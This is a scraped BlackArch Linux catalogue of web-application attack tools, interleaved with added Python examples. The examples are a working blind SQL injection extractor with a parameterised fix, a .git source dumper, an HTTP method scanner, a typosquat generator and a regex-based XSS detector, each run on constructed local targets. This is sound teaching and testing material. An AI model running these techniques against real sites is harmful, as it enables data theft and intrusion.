Webapp tools

BlackArch webapp: packages that operate on web applications, web servers and the CMS and frameworks behind them.

Tool count: 145
Name | Version | Description | Homepage
0d1n | 201.977b1d7 | Web security tool for fuzzing HTTP inputs, written in C with libcurl. |

1 of 11 6/9/17, 6:54 PM
adfind | 19.8d62713 | Simple admin panel finder for php, js, cgi, asp and aspx admin panels. |
adminpagefinder | 0.1 | This python script looks for a large amount of possible administrative interfaces on a given site. | /112855/Admin-Page-Finder-Script.html
albatar | 24.142f892 | A SQLi exploitation framework in Python. |
anti-xss | 165.6534a4d | An XSS vulnerability scanner. | /anti-XSS
arachni | 1.5.1 | A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. |
bbqsql | 259.4f7c086 | SQL injection exploit tool. |
bbscan | 35.995e1ea | A tiny Batch weB vulnerability Scanner. |
bing-lfi-rfi | 0.1 | This is a python script for searching Bing for sites that may have local and remote file inclusion ... |
brutexss | 54.ba753df | Cross-Site Scripting Bruteforcer. | /shawarkhanethicalhacker/BruteXSS
bsqlbf | 2.7 | Blind SQL Injection Brute ... |
bsqlinjector | 8.5dc3f27 | Blind SQL injection exploitation tool written in ... |
cansina | 174.850603e | A python-based Web Content Discovery Tool. |
chankro | 3.c150607 | Tool that generates a PHP file capable of running a custom binary (like a meterpreter) or a bash script (e.g. a reverse shell), bypassing disable_functions & ... |
cjexploiter | 6.72b08d8 | Drag and Drop ClickJacking exploit development assistance ... |
cloudget | 53.807d08e | Python script to bypass cloudflare from command line. Built upon cfscrape ... | /cloudget
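The blind SQL injection entries above (bsqlbf, bsqlinjector, bbqsql, albatar) all automate one idea: turn a yes/no difference in the application's response into an oracle and read data out one character at a time. The following is an added example written for this page, not code from any of those packages. The SQLite table, the user names and the password hashes are constructed sample data; the vulnerable function shows the flaw, the fixed one shows the bound-parameter repair, and the attacker side works against whichever is passed in.

```python
"""Boolean-based blind SQL injection, worked end to end against an in-memory
SQLite application. Added example for this page, not code from bsqlbf,
bsqlinjector or any other listed package. The table, user names and password
hashes below are constructed sample data."""
import sqlite3

DB = sqlite3.connect(":memory:", check_same_thread=False)
DB.executescript("""
    CREATE TABLE users (name TEXT PRIMARY KEY, pw_hash TEXT NOT NULL);
    INSERT INTO users VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    INSERT INTO users VALUES ('bob',   'e99a18c428cb38d5f260853678922e03');
""")


def user_exists_vulnerable(name: str) -> bool:
    """The flaw: user input is spliced into the SQL text. The caller only
    learns True/False, which is all a blind injector needs."""
    query = f"SELECT 1 FROM users WHERE name = '{name}'"
    return DB.execute(query).fetchone() is not None


def user_exists_fixed(name: str) -> bool:
    """The fix: a bound parameter. Input can never change the query's shape."""
    query = "SELECT 1 FROM users WHERE name = ?"
    return DB.execute(query, (name,)).fetchone() is not None


def make_oracle(probe):
    """Turn the application's yes/no answer into a 'does this SQL condition
    hold?' oracle: close the string, AND in our condition, comment out the
    rest. The 'admin' prefix keeps the base query true."""
    def oracle(condition: str) -> bool:
        return probe(f"admin' AND ({condition}) --")
    return oracle


def extract_string(oracle, expr: str, max_len: int = 64) -> str:
    """Recover the value of an SQL expression one character at a time.
    Each character is found by binary search over its 7-bit code point,
    so about seven oracle calls per character plus one length check."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length({expr}) >= {pos}"):
            break                                  # past the end of the string
        lo, hi = 0, 127
        while lo < hi:                             # invariant: lo <= code point <= hi
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def steal_admin_hash(probe) -> str:
    """Run the attack through whichever application function is supplied.
    Against the parameterised version the injected quote never closes the
    string, the length check fails at once and nothing comes back."""
    target = "(SELECT pw_hash FROM users WHERE name = 'admin')"
    return extract_string(make_oracle(probe), target)


if __name__ == "__main__":
    print("vulnerable:", steal_admin_hash(user_exists_vulnerable))
    print("fixed:     ", repr(steal_admin_hash(user_exists_fixed)))
```

Extraction costs roughly seven requests per character, which is why the real tools fall back to this only when error-based, UNION or time-based channels are unavailable. The same oracle construction works unchanged against a web form: replace the probe with an HTTP request and a test on the response (status, length or a marker string).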

cms-few | 0.1 | Joomla, Mambo, PHP-Nuke, and XOOPS CMS SQL injection vulnerability scanning tool written in Python. |
cmsfuzz | 5.6be5a98 | Fuzzer for wordpress, cold fusion, drupal, joomla, and ... |
commix | 852.4dac77e | Automated All-in-One OS Command Injection and Exploitation Tool. |
crawlic | 51.739fe2b | Web recon tool (find temporary files, parse robots.txt, search folders, google dorks and search domains hosted on same ... |
csrftester | 1.0 | Project attempts to give developers the ability to test their applications for CSRF flaws. |
cybercrowl | 87.26bef0f | A Python Web path scanner tool. |
darkjumper | 5.8 | This tool will try to find every website hosted on the same server as your ... | /darkjumper/
davscan | 23.ce342c0 | Fingerprints servers, finds exploits, scans WebDAV. |
dff-scanner | 1.1 | Tool for finding path of predictable resource ... |
dirbuster-ng | 9.0c34920 | C CLI implementation of the Java dirbuster tool. | /dirbuster-ng
dirsearch | 204.fb88b47 | HTTP(S) directory/file brute forcer. | /dirsearch
domi-owned | 41.583d0a5 | A tool used for compromising IBM/Lotus Domino servers. |
doork | 6.90c7260 | Passive Vulnerability ... |
drupal-module-enum | | Enumerate Drupal modules. | module-enumeration
drupalscan | 0.5.2 | Simple non-intrusive Drupal scanner. | /gems/DrupalScan/
dsfs | 32.e27d6cb | A fully functional File inclusion vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code. |

dsjs | 21.79cb2c4 | A fully functional JavaScript library vulnerability scanner written in under 100 lines of code. |
dsss | 116.6d14edb | A fully functional SQL injection vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code. |
dsxs | 117.7fd87d0 | A fully functional Cross-site scripting vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code. |
epicwebhoneypot | 2.0a | Tool which aims to lure attackers using various types of web vulnerability scanners by tricking them into believing that they have found a vulnerability on a host. |
eyewitness | 605.537d82a | Designed to take screenshots of websites, provide some server header info, and identify default credentials if ... | /EyeWitness
fbht | 70.d75ae93 | A Facebook Hacking Tool. |
fhttp | 1.3 | This is a framework for HTTP related attacks. It is written in Perl with a GTK interface, has a proxy for debugging and manipulation, proxy chaining, evasion rules, and more. | /104315/FHTTP-Attack-Tool.3.html
filebuster | 29.3764608 | An extremely fast and flexible web fuzzer. |
ghost-py | 0.2.3 | Webkit based webclient (relies on PyQT). |
gittools | 23.d2455b3 | A repository with 3 tools for pwn'ing websites with .git repositories available. |
golismero | 50.3af264a | Opensource web security testing framework. |
grabber | 0.1 | A web application scanner. Basically it detects some kind of vulnerabilities in your website. |
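gittools above recovers source from a web root that serves its .git directory. As an added example, not gittools' own code, here is the minimum such a dumper needs: read HEAD, follow the ref, then inflate and parse the loose commit, tree and blob objects by exact path, which works even when directory listing is off. The "exposed repository" is a constructed in-memory dict of path to bytes standing in for HTTP responses; the file names and the secrets in them are sample data.

```python
"""Recovering source from a web root that serves its .git directory, the
technique behind gittools. Added example written for this page, not gittools'
own code. The 'exposed repository' is a constructed dict of path -> bytes that
stands in for HTTP responses; file names and secrets in it are sample data."""
import hashlib
import zlib


def git_object(kind: str, body: bytes):
    """Loose-object encoding: '<type> <size>\\0<body>', SHA-1 over that, zlib."""
    raw = f"{kind} {len(body)}\0".encode() + body
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def build_exposed_repo() -> dict:
    """Constructed target: what GET /.git/<path> would return for each path."""
    files = {}

    def store(kind, body):
        sha, data = git_object(kind, body)
        files[f"objects/{sha[:2]}/{sha[2:]}"] = data
        return sha

    env = store("blob", b"DB_PASSWORD=hunter2\nAPI_KEY=sk_live_example\n")
    index = store("blob", b"<?php require __DIR__ . '/.env'; ?>\n")
    # tree entries: '<mode> <name>\0<20 raw sha bytes>', sorted by name
    tree = store("tree", b"100644 .env\0" + bytes.fromhex(env)
                 + b"100644 index.php\0" + bytes.fromhex(index))
    commit = store("commit", (
        f"tree {tree}\n"
        "author Dev <dev@example.invalid> 1496000000 +0000\n"
        "committer Dev <dev@example.invalid> 1496000000 +0000\n"
        "\ninitial import\n").encode())
    files["HEAD"] = b"ref: refs/heads/master\n"
    files["refs/heads/master"] = f"{commit}\n".encode()
    return files


def fetch(files: dict, path: str) -> bytes:
    """Stand-in for an HTTP GET of /.git/<path>; KeyError plays the 404."""
    return files[path]


def read_object(files, sha):
    """Inflate a loose object, verify its hash and split off the header."""
    raw = zlib.decompress(fetch(files, f"objects/{sha[:2]}/{sha[2:]}"))
    if hashlib.sha1(raw).hexdigest() != sha:
        raise ValueError(f"object {sha} is corrupt")
    header, _, body = raw.partition(b"\0")
    return header.split(b" ")[0].decode(), body


def parse_tree(body: bytes):
    """Yield (mode, name, hex sha) for each entry of a tree object."""
    i = 0
    while i < len(body):
        nul = body.index(b"\0", i)
        mode, name = body[i:nul].decode().split(" ", 1)
        yield mode, name, body[nul + 1:nul + 21].hex()
        i = nul + 21


def dump_head(files: dict) -> dict:
    """HEAD -> ref -> commit -> tree -> blobs; returns {path: content}."""
    ref = fetch(files, "HEAD").decode().strip()
    if ref.startswith("ref: "):                     # symbolic ref, follow it
        ref = fetch(files, ref[5:]).decode().strip()
    kind, commit = read_object(files, ref)
    if kind != "commit":
        raise ValueError("HEAD does not point at a commit")
    tree_sha = commit.split(b"\n", 1)[0].split(b" ")[1].decode()
    recovered = {}

    def walk(sha, prefix):
        for _mode, name, child in parse_tree(read_object(files, sha)[1]):
            ckind, cbody = read_object(files, child)
            if ckind == "tree":
                walk(child, prefix + name + "/")
            else:
                recovered[prefix + name] = cbody

    walk(tree_sha, "")
    return recovered


if __name__ == "__main__":
    for path, content in dump_head(build_exposed_repo()).items():
        print(path, content.decode(errors="replace"), sep=": ")
```

Real targets usually also hold packfiles under objects/pack/, which need the pack and index formats on top of this, and the dumpers walk parent commits too, so a secret removed in a later commit is still recoverable from history. The fix is to deny access to /.git at the web server (and to keep deployment artefacts out of the document root), not to rely on directory listing being disabled.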

htcap | 45.e54399f | A web application analysis tool for detecting communications between javascript and the server. |
httpforge | 11.02.01 | A set of shell tools that let you manipulate, send, receive, and analyze HTTP messages. These tools can be used to test, discover, and assert the security of Web servers, apps, and sites. An accompanying Python library is available for extensions. | /98109/HTTPForge.02.01.html
httppwnly | 47.528a664 | "Repeater" style XSS post-exploitation tool for mass browser control. |
jaidam | 10.a7d7c4a | Penetration testing tool that takes as input a list of domain names, scans them, determines if the wordpress or joomla platform was used and finally checks them automatically for web vulnerabilities using two well-known open source tools, WPScan and ... |
jexboss | 86.338b531 | Jboss verify and Exploitation Tool. |
jomplug | 0.1 | This php script fingerprints a given Joomla system and then uses Packet Storm's archive to check for bugs related to the installed ... | /121390/Janissaries-Joomla-Fingerprint-
jooforce | 11.43c21ad | A Joomla password brute force tester. |
joomlascan | 1.2 | Joomla scanner scans for known vulnerable remote file inclusion paths and ... | /62126/
joomlavs | 230.e26b637 | A black box, Ruby powered, Joomla vulnerability scanner. |
joomscan | 2012.03.10 | Detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla! web site. |
jsql-injection | 0.79 | A Java application for automatic SQL database ... |
kadimus | 50.5897871 | LFI Scan & Exploit Tool. |

kolkata | 3.0 | A web application fingerprinting engine written in Perl that combines cryptography with IDS evasion. |
lfi-exploiter | 1.1 | This perl script leverages /proc/self/environ to attempt getting code execution out of a local file inclusion vulnerability. |
lfi-fuzzploit | 1.1 | A simple tool to help in the fuzzing for, finding, and exploiting of local file inclusion vulnerabilities in Linux-based PHP ... | /106912/LFI-Fuzzploit-Tool.1.html
lfi-image-helper | 0.8 | A simple script to infect images with PHP Backdoors for local file inclusion attacks. | /129871/LFI-Image-Helper.8.html
lfi-sploiter | 1.0 | This tool helps you exploit LFI (Local File Inclusion) vulnerabilities. Post discovery, simply pass the affected URL and vulnerable parameter to this tool. You can also use this tool to scan a URL for LFI vulnerabilities. | /96056/Simple-Local-File-Inclusion-Exploiter.0.html
lfifreak | 21.0c6adef | A unique automated LFi Exploiter with Bind/Reverse Shells. |
lfimap | 1.4.8 | This script is used to get the most out of a local file include vulnerability in a ... |
liffy | 65.8011cdd | A Local File Inclusion Exploitation tool. |
lightbulb | 27.a77c818 | Python framework for auditing web applications. |
magescan | 1.12.5 | Scan a Magento site for information. | /magescan
 | 9.8b34f1a | Web Command Injection |
metoscan | 05 | Tool for scanning the HTTP methods supported by a webserver. It works by testing a URL and checking the responses for the different requests. |
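metoscan's technique, as an added example written for this page (not metoscan's code): ask the server with OPTIONS, then send every method anyway and compare, because the Allow header is whatever the server chooses to say. The target here is a constructed local http.server handler that, like some real deployments, advertises fewer methods than it accepts; the method list and the "risky" set are the example's own choices.

```python
"""HTTP method enumeration the way metoscan does it: ask with OPTIONS, then
send every method anyway and compare. Added example for this page, not
metoscan's code. The target is a constructed local http.server handler that,
like some real deployments, advertises fewer methods than it accepts."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

METHODS = ("GET", "HEAD", "POST", "PUT", "DELETE", "TRACE", "OPTIONS", "PATCH", "CONNECT")
RISKY = {"PUT", "DELETE", "TRACE", "CONNECT"}      # upload, removal, XST, tunnelling
REFUSED = {400, 404, 405, 501}                     # status codes that mean "not here"


class LyingServer(BaseHTTPRequestHandler):
    """Constructed target: OPTIONS claims GET and HEAD only, yet PUT is
    accepted and TRACE echoes the request. Unhandled methods get 501."""

    def log_message(self, *args):                  # keep the demo quiet
        pass

    def _reply(self, code, body=b""):
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        self.send_response(204)
        self.send_header("Allow", "GET, HEAD")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self):
        self._reply(200, b"ok")

    def do_HEAD(self):
        self._reply(200)

    def do_PUT(self):
        self._reply(201, b"stored")

    def do_TRACE(self):
        self._reply(200, self.requestline.encode())


def send(host, port, method, path="/"):
    """One request; returns (status, Allow header or '')."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request(method, path)
        resp = conn.getresponse()
        resp.read()
        return resp.status, resp.getheader("Allow") or ""
    finally:
        conn.close()


def scan_methods(host, port, path="/"):
    """Compare what the server advertises with what it actually accepts."""
    _, allow = send(host, port, "OPTIONS", path)
    advertised = {m.strip().upper() for m in allow.split(",") if m.strip()}
    probed = {m: send(host, port, m, path)[0] for m in METHODS}
    supported = {m for m, status in probed.items() if status not in REFUSED}
    return {
        "advertised": advertised,
        "probed": probed,
        "supported": supported,
        "hidden": supported - advertised - {"OPTIONS"},   # accepted but not advertised
        "risky": supported & RISKY,
    }


def run_demo():
    """Start the constructed target on a free loopback port, scan it, tear it down."""
    server = HTTPServer(("127.0.0.1", 0), LyingServer)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    try:
        return scan_methods("127.0.0.1", server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    result = run_demo()
    for method, status in result["probed"].items():
        print(f"{method:<8} {status}")
    print("advertised:", sorted(result["advertised"]))
    print("hidden:    ", sorted(result["hidden"]))
    print("risky:     ", sorted(result["risky"]))
```

Scan a real host by calling scan_methods with its name and port. A 200 to PUT or DELETE on a probe path is not proof of write access (many frameworks route everything to one handler), so follow up by trying to create and then fetch a harmless file, and treat a 200 to TRACE as worth reporting on its own.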

morxtraversal | 1.0 | Path Traversal checking ... |
multiinjector | 0.4 | Automatic SQL injection utility using a list of URI addresses to test parameter manipulation. |
nosqlmap | 194.da333c3 | Automated Mongo database and NoSQL web application exploitation tool. |
novahot | 1.0.1 | A webshell framework for penetration testers. | /novahot
opendoor | 107.a913a17 | OWASP Directory Access scanner. | web/OpenDoor
owasp-bywaf | 26.e730d1b | A web application penetration testing framework (WAPTF). |
owtf | 1017.0bbeea1 | The Offensive (Web) Testing Framework. | /OWASP_OWTF
pappy-proxy | 66.cd9b3ef | An intercepting proxy for web application testing. |
paros | 3.2.13 | Java-based HTTP/HTTPS proxy for assessing web app vulnerabilities. Supports editing/viewing HTTP messages on-the-fly, spiders, client certificates, proxy-chaining, intelligent scanning for XSS and SQLi, etc. |
payloadmask | 16.ff38964 | Web Payload list editor to use techniques to try bypass web application ... | /payloadmask
peepingtom | 56.bc6f4d8 | A tool to take screenshots of websites. Much like ... |
php-findsock-shell | 2.b8a984f | A Findsock Shell implementation in PHP + ... |
phpsploit | 749.f34864d | Stealth post-exploitation ... |
plecost | 88.149fd34 | Wordpress finger printer. |
plown | 13.ccf998c | A security scanner for Plone CMS. |
proxenet | 712.67fc6b5 | THE REAL hacker friendly proxy for web application ... |
pyfiscan | 1920.bd6fd54 | Free web-application vulnerability and version ... |
riwifshell | 38.40075d5 | Web backdoor - infector - ... |

ruler | 195.152d9a4 | A tool to abuse Exchange ... |
rww-attack | 0.9.2 | The Remote Web Workplace Attack tool will perform a dictionary attack against a live Microsoft Windows Small Business Server's 'Remote Web Workplace' portal. It currently supports both SBS 2003 and SBS 2008 and includes features to avoid account lock out. | /79021/Remote-Web-Workplace-Attack-Tool.html
sawef | 28.e65dc9f | Send Attack Web Forms. |
scrapy | 1.4.0 | A fast high-level scraping and web crawling ... |
secscan | 1.5 | Web Apps Scanner and Much more utilities. |
shortfuzzy | 0.1 | A web fuzzing script written in perl. | /104872/Short-Fuzzy-Rat-Scanner.html
smplshllctrlr | 9.2baf390 | PHP Command Injection exploitation tool. |
snuck | 6.76196b6 | Automatic XSS filter ... |
spaf | 11.671a976 | Static Php Analysis and ... |
sparty | 0.1 | An open source tool written in python to audit web applications using sharepoint and frontpage ... |
spiga | 460.59d653c | Configurable web resource scanner. | n-tools/blob/master/
spike-proxy | 148 | A Proxy for detecting vulnerabilities in web ... |
spipscan | 69.4ad3235 | SPIP (CMS) scanner for penetration testing purpose written in Python. |
sqid | 0.3 | A SQL injection digger. |
sqlmap | 1.1.6 | Automatic SQL injection and database takeover tool. |
themole | 0.3 | Automatic SQL injection exploitation tool. |
tplmap | 650.1a033c3 | Automatic Server-Side Template Injection Detection and Exploitation. |
typo-enumerator | 77.9565029 | Enumerate Typo3 version and extensions. | Enumerator

uppwn | 5.b7cdd93 | A script that automates detection of security flaws on websites' file upload ... |
urlcrazy | 0.5 | Generate and test domain typos and variations to detect and perform typo squatting, URL hijacking, phishing, and corporate ... | /research/urlcrazy
urldigger | 02c | A python tool to extract URL addresses from different HOT sources and/or detect SPAM and malicious code. |
vanguard | 0.1 | A comprehensive web penetration testing tool written in Perl that identifies vulnerabilities in web ... | /110603/Vanguard-Pentesting-Scanner.html
vbscan | 25.27c77e9 | A black box vBulletin vulnerability scanner written in perl. |
vega | 1.0 | An open source platform to test the security of web ... |
vsvbp | 6.241a7ab | Black box tool for Vulnerability detection in web applications. |
vulnerabilities-spider | | A tool to scan for web vulnerabilities. | /Vulnerabilities-spider
wafninja | 18.f9ec0ae | A tool which contains two functions to attack Web Application Firewalls. |
wafp | 0.01_26c3 | An easy to use Web Application Finger Printing tool written in ruby using sqlite3 databases for storing the fingerprints. | /84468/Web-Application-Finger-Printer.01-26c3.html
wafpass | 44.624ac65 | Analysing parameters with all payloads' bypass methods, aiming at benchmarking security solutions like WAF. |
waybackpack | 49.36db906 | Download the entire Wayback Machine archive for a given URL. |
web-soul | 2 | A plugin based scanner for attacking and data mining web sites written in Perl. |
webhandler | 334.bcc9f0d | A handler for PHP system functions & also an alternative 'netcat' handler. |
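The generation step that urlcrazy (above) performs before it resolves anything, as an added example written for this page rather than urlcrazy's code. Each strategy (omission, transposition, repetition, adjacent key, homoglyph, hyphenation, wrong TLD) is a few lines; the keyboard-adjacency and homoglyph tables are small hand-written subsets and the TLD list is illustrative, all of which are this example's assumptions. A real run then resolves each candidate and checks registration and MX records to find which are live; the blue-team use is the reverse lookup at the end.

```python
"""Domain typo and look-alike generation of the kind urlcrazy automates.
Added example for this page, not urlcrazy's code. The keyboard-adjacency and
homoglyph tables are small hand-written subsets (an assumption, real tools
carry much larger ones); the alternative TLD list is likewise illustrative."""

QWERTY_NEIGHBOURS = {
    "a": "qwsz", "b": "vghn", "c": "xdfv", "d": "serfcx", "e": "wsdr",
    "f": "drtgvc", "g": "ftyhbv", "h": "gyujnb", "i": "ujko", "j": "huikmn",
    "k": "jiolm", "l": "kop", "m": "njk", "n": "bhjm", "o": "iklp", "p": "ol",
    "q": "wa", "r": "edft", "s": "awedxz", "t": "rfgy", "u": "yhji",
    "v": "cfgb", "w": "qase", "x": "zsdc", "y": "tghu", "z": "asx",
}
HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4", "s": "5",
              "g": "9", "m": "rn", "w": "vv"}
ALT_TLDS = ["com", "co", "cm", "net", "org"]


def typo_variants(domain: str) -> dict:
    """Map each candidate domain to the first strategy that produced it.
    Assumes a plain second-level name such as 'example.com'."""
    name, _, tld = domain.partition(".")
    found = {}

    def add(candidate, strategy):
        if candidate and candidate != name:
            found.setdefault(f"{candidate}.{tld}", strategy)

    for i in range(len(name)):                       # dropped character
        add(name[:i] + name[i + 1:], "omission")
    for i in range(len(name) - 1):                   # swapped neighbours
        add(name[:i] + name[i + 1] + name[i] + name[i + 2:], "transposition")
    for i in range(len(name)):                       # doubled character
        add(name[:i] + name[i] + name[i:], "repetition")
    for i, ch in enumerate(name):                    # fat-finger on QWERTY
        for alt in QWERTY_NEIGHBOURS.get(ch, ""):
            add(name[:i] + alt + name[i + 1:], "adjacent key")
    for i, ch in enumerate(name):                    # visually similar
        if ch in HOMOGLYPHS:
            add(name[:i] + HOMOGLYPHS[ch] + name[i + 1:], "homoglyph")
    for i in range(1, len(name)):                    # ex-ample.com
        add(name[:i] + "-" + name[i:], "hyphenation")
    for alt in ALT_TLDS:                             # example.co, example.cm
        if alt != tld:
            found.setdefault(f"{name}.{alt}", "tld")
    return found


def is_lookalike(candidate: str, brand: str):
    """Blue-team use: which strategy, if any, turns brand into candidate.
    Returns the strategy name or None."""
    return typo_variants(brand).get(candidate.lower())


if __name__ == "__main__":
    for dom, why in sorted(typo_variants("example.com").items()):
        print(f"{dom:<18} {why}")
```

The same table feeds both sides: an attacker registers the candidates, a defender runs newly observed domains from mail logs or certificate transparency through is_lookalike. Homoglyph generation here is ASCII-only; IDN homographs (Cyrillic "а" for Latin "a") are a separate, larger table and need punycode handling.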

webslayer | 5 | A tool designed for brute forcing Web Applications. |
webxploiter | 56.c03fe6b | An OWASP Top 10 Security scanner. |
whatsmyname | 203.d4a9651 | Tool to perform user and username enumeration on various websites. |
whichcdn | 22.5fc6ddd | Tool to detect if a given website is protected by a Content Delivery Network. |
wig | 574.d5ddd91 | WebApp Information ... |
witchxtool | 1.1 | A perl script that consists of a port scanner, LFI scanner, MD5 bruteforcer, dork SQL injection scanner, fresh proxy scanner, and a dork LFI ... | /97465/Witchxtool-Port-LFI-SQL-Scanner-And-MD5-Bruteforcing-Tool.1.html
wordpress-exploit-framework | | A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems. | exploit-framework
wpforce | 66.609ea93 | Wordpress Attack Suite. |
wpscan | 2.9.2 | Black box WordPress vulnerability scanner. |
wpseku | 16.e5dc097 | Simple Wordpress Security ... |
ws-attacker | 1.7 | A modular framework for web services penetration ... |
wuzz | 187.b289c84 | Interactive cli tool for HTTP ... |
xsscrapy | 138.f859faa | XSS spider - 66/66 wavsep XSS detected. | /xsscrapy
xsser | 1.7 | A penetration testing tool for detecting and exploiting XSS vulnerabilities. |
xssless | 45.8e7ebe1 | An automated XSS payload generator written in python. |
xsspy | 50.9c76ec7 | Web Application XSS ... |
xsss | 0.40b | A brute force cross site scripting scanner. |
xssscan | 17.7f1ea90 | Command line tool for detection of XSS attacks in URLs. Based on ModSecurity rules from ... |
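xssscan above matches ModSecurity rules against URLs. The following is an added example written for this page, not xssscan's code, and its rule set is a small hand-written one in the spirit of a WAF ruleset rather than the ModSecurity rules themselves (an assumption). What it shows is the part such detectors get wrong most often: the value has to be normalised (URL-decoded repeatedly, HTML entities unescaped, lower-cased) before matching, otherwise one extra layer of encoding walks straight past the patterns. The sample URLs are constructed.

```python
"""Detecting XSS payloads in request URLs, the job xssscan does with
ModSecurity rules. Added example for this page, not xssscan's code; the rules
below are a small hand-written set in the spirit of a WAF ruleset, not the
ModSecurity rules themselves (assumption). The point: normalise the value
(URL-decode repeatedly, unescape HTML entities, lower-case) before matching,
or a single extra layer of encoding walks straight past the patterns."""
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

RULES = [
    ("script tag", re.compile(r"<\s*script\b")),
    ("event handler", re.compile(r"\bon[a-z]+\s*=")),
    ("javascript scheme", re.compile(r"javascript\s*:")),
    ("active tag", re.compile(r"<\s*(?:img|iframe|svg|object|embed|body)\b")),
    ("eval/expression", re.compile(r"\b(?:eval|expression)\s*\(")),
]


def normalise(value: str, max_rounds: int = 3) -> str:
    """Peel layered encodings the way the application eventually will:
    %253C -> %3C -> <, &#x3c; -> <. Bounded so a pathological input cannot loop."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value.lower()


def _inputs(url: str):
    """Everything in a URL an attacker controls: path, query params, fragment."""
    parts = urlsplit(url)
    yield "path", parts.path
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        yield name, raw                               # parse_qsl decoded one layer already
    if parts.fragment:
        yield "#fragment", parts.fragment


def scan_url(url: str, decode: bool = True):
    """Return [(location, rule, value-as-matched)] for every rule that fires.
    decode=False reproduces the mistake of matching the raw value."""
    hits = []
    for where, raw in _inputs(url):
        value = normalise(raw) if decode else raw.lower()
        for rule, pattern in RULES:
            if pattern.search(value):
                hits.append((where, rule, value))
    return hits


# Constructed sample URLs (hostnames are placeholders).
BENIGN = "http://shop.example/search?q=red+shoes&page=2"
PLAIN = "http://shop.example/search?q=%3Cscript%3Ealert(1)%3C/script%3E"
DOUBLE = "http://shop.example/search?q=%253Cscript%253Ealert(1)%253C%252Fscript%253E"
ENTITY = "http://shop.example/search?q=%26%2360%3Bscript%26%2362%3Balert(1)"
FRAGMENT = "http://shop.example/page#javascript:alert(document.cookie)"

if __name__ == "__main__":
    for url in (BENIGN, PLAIN, DOUBLE, ENTITY, FRAGMENT):
        print(url)
        print("   raw match:", [h[1] for h in scan_url(url, decode=False)])
        print("   decoded:  ", [h[1] for h in scan_url(url)])
```

The decode depth should mirror what the application actually does with the value: decoding more layers than the application does produces false positives on legitimately encoded data, decoding fewer produces the bypass the DOUBLE and ENTITY samples demonstrate. The fragment never reaches the server, so a server-side log scanner sees it only when the client leaks it (for example through a Referer); it is included here because DOM-based XSS lives there.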

xsssniper | 0.9 | An automatic XSS discovery tool. |
xssya | 13.cd62817 | A Cross Site Scripting Scanner & Vulnerability ... |
xwaf | 119.cb7964a | Automatic WAF bypass ... |
yaaf | 7.4d6273a | Yet Another Admin Finder. |
yasuo | 117.8fd52f2 | A ruby script that scans for vulnerable & exploitable 3rd-party web applications on a network. |
yawast | 416.8ed019e | The YAWAST Antecedent Web Application Security ... |
ycrawler | 0.1 | A web crawler that is useful for grabbing all user supplied input related to a given website and will save the output. It has proxy and log file support. | /98546/yCrawler-Web-Crawling-Utility.html
ysoserial | 0.0.4 | A proof-of-concept tool for generating payloads that exploit unsafe Java object ... |
zaproxy | 2.6.0 | Integrated penetration testing tool for finding vulnerabilities in web ... |

BlackArch Linux 2013-2017
